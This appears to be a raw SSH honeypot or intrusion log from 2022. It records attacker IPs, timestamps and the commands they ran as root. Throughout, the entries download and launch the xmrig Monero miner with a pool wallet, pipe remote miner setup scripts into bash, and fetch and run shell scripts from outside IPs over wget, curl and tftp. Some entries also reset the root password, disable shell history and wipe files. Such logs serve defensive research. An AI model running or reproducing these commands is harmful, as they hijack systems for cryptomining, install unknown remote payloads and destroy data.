Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
pkill xmrig*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0
./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0

From 101.34.25.110 25-Sep-2022 23:27:24 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
pkill xmrig*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0
./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.uwu -p x -k --nicehash --coin monero -a rx/0

From 37.116.206.113 26-Sep-2022 01:11:19 ssh2 root
Exec /ip cloud print
/ip cloud print

From 101.34.25.110 26-Sep-2022 02:24:56 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp; rm -rf xmr*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && sudo su; ./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
sudo su
./xmrig -o stratum+tcp://randomxmonero.usa-east.nicehash.com:3380 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J -k --nicehash --coin monero -a rx/0

From 101.34.25.110 26-Sep-2022 02:50:10 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
pkill xmrig*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0
./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.$RANDOM -p x -k --nicehash --coin monero -a rx/0

From 115.49.33.138 26-Sep-2022 11:22:11 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 141.98.10.88 26-Sep-2022 14:05:40 ssh2 root
Exec echo root:23jh1337422a1ny1234|chpasswd|bash; lspci | grep VGA || lspci | grep 3D; nvidia-smi; cat/etc/issue; uname -a; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1
echo root:23jh1337422a1ny1234|chpasswd|bash
lspci | grep VGA || lspci | grep 3D
nvidia-smi
cat/etc/issue
uname -a
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 458YJv4nmko9qR4LA8gP7ED7gV4XUiQCFeGoM7No51UJUxYBr3ExREgKWfUkRCoJxNJTUcpmnTYqV7VnWApFfc7o49S1VS1

From 185.196.220.32 5-Oct-2022 03:03:26 ssh2 root
Exec cd /tmp; wget http://179.43.175.5/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; curl http://179.43.175.5/sshc.sh -o sshc.sh; chmod 777 sshc.sh; sh sshc.sh; rm -rf *;
cd /tmp
wget http://179.43.175.5/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
curl http://179.43.175.5/sshc.sh -o sshc.sh
chmod 777 sshc.sh
sh sshc.sh
rm -rf *

From 34.141.5.23 5-Oct-2022 16:47:41 ssh2 root
Exec cd /tmp; rm -rf xmr*; pkill xmrig*; wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0
cd /tmp
rm -rf xmr*
pkill xmrig*
wget https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz
tar -xvf xmrig-6.18.0-linux-x64.tar.gz
cd xmrig-6.18.0
screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0
./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0

From 35.185.96.254 6-Oct-2022 19:53:02 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
sh wget.sh server
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 34.168.97.42 6-Oct-2022 21:15:27 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
wget http://179.43.175.5/wget.sh
cd /tmp
rm -rf wget*
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
wget http://179.43.175.5/wget.sh
./wget.sh server
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
sh wget.sh server
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 185.196.220.32 9-Oct-2022 06:18:54 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server; rm -rf *
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
rm -rf *

From 35.234.68.224 18-Oct-2022 00:30:49 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
./wget.sh server
sh wget.sh server
sh wget.sh server

From 34.89.68.121 18-Oct-2022 17:20:35 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
wget http://179.43.175.5/wget.sh
cd /tmp
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
rm -rf wget*
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
wget http://179.43.175.5/wget.sh
./wget.sh server
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
sh wget.sh server
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 34.142.109.103 20-Oct-2022 21:40:23 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
./wget.sh server
cd /tmp
rm -rf wget*
sh wget.sh server
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 34.142.14.174 21-Oct-2022 01:21:17 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 35.245.11.156 22-Oct-2022 20:01:47 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
cd /tmp
rm -rf wget*
./wget.sh server
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
sh wget.sh server
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 35.242.189.58 23-Oct-2022 01:44:21 ssh2 root
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
cd /tmp
rm -rf wget*
./wget.sh server
sh wget.sh server
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server
Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server
cd /tmp
rm -rf wget*
wget http://179.43.175.5/wget.sh
curl -O http://179.43.175.5/wget.sh
chmod 777 wget.sh
./wget.sh server
sh wget.sh server

From 35.189.124.177 2-Nov-2022 12:15:24 ssh2 root
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh

From 34.82.200.51 5-Nov-2022 00:12:16 ssh2 root
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
rm -rf 774.sh*
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
chmod 777 774.sh
./774.sh
./774.sh
sh 774.sh
sh 774.sh
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh

From 35.188.162.38 5-Nov-2022 04:12:41 ssh2 root
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh
Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh
cd /tmp
rm -rf 774.sh*
wget http://179.43.175.5/774.sh
curl -O http://179.43.175.5/774.sh
chmod 777 774.sh
./774.sh
sh 774.sh

From 3.238.110.91 11-Nov-2022 16:34:32 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://3.90.219.71/Dynabins.sh; curl http://3.90.219.71/Dynabins.sh; chmod 777 Dynabins.sh; sh Dynabins.sh; tftp 3.90.219.71 -c get Dynatftp1.sh; chmod 777 Dynatftp1.sh; sh Dynatftp1.sh; tftp -r Dynatftp2.sh -g 3.90.219.71; chmod 777 Dynatftp2.sh; sh Dynatftp2.sh; rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh; rm -fr *
cd /tmp || cd /run || cd /
wget http://3.90.219.71/Dynabins.sh
curl http://3.90.219.71/Dynabins.sh
chmod 777 Dynabins.sh
sh Dynabins.sh
tftp 3.90.219.71 -c get Dynatftp1.sh
chmod 777 Dynatftp1.sh
sh Dynatftp1.sh
tftp -r Dynatftp2.sh -g 3.90.219.71
chmod 777 Dynatftp2.sh
sh Dynatftp2.sh
rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh
rm -fr *

From 3.136.23.179 13-Nov-2022 04:19:09 ssh2 root
Exec curl -s http://18.188.207.128/bins.sh | bash
curl -s http://18.188.207.128/bins.sh | bash

From 148.72.247.138 10-Dec-2022 06:30:49 ssh2 root
Exec curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash
curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash

From 148.72.247.138 10-Dec-2022 06:33:54 ssh2 root
Exec curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | bash
curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | bash

From 148.72.247.138 10-Dec-2022 06:45:54 ssh2 root
Exec whoami > sbmg
whoami > sbmg

From 159.223.89.88 11-Dec-2022 16:11:01 ssh2 root
Exec unset HISTFILE ; unset HISTSIZE
unset HISTFILE
unset HISTSIZE

From 34.107.101.194 23-Dec-2022 03:52:27 ssh2 root
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
cd /tmp
rm -rf 351*
wget http://45.67.230.216/351.sh
curl -O http://45.67.230.216/351.sh
chmod 777 351.sh
./351.sh server
sh 351.sh server
Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server
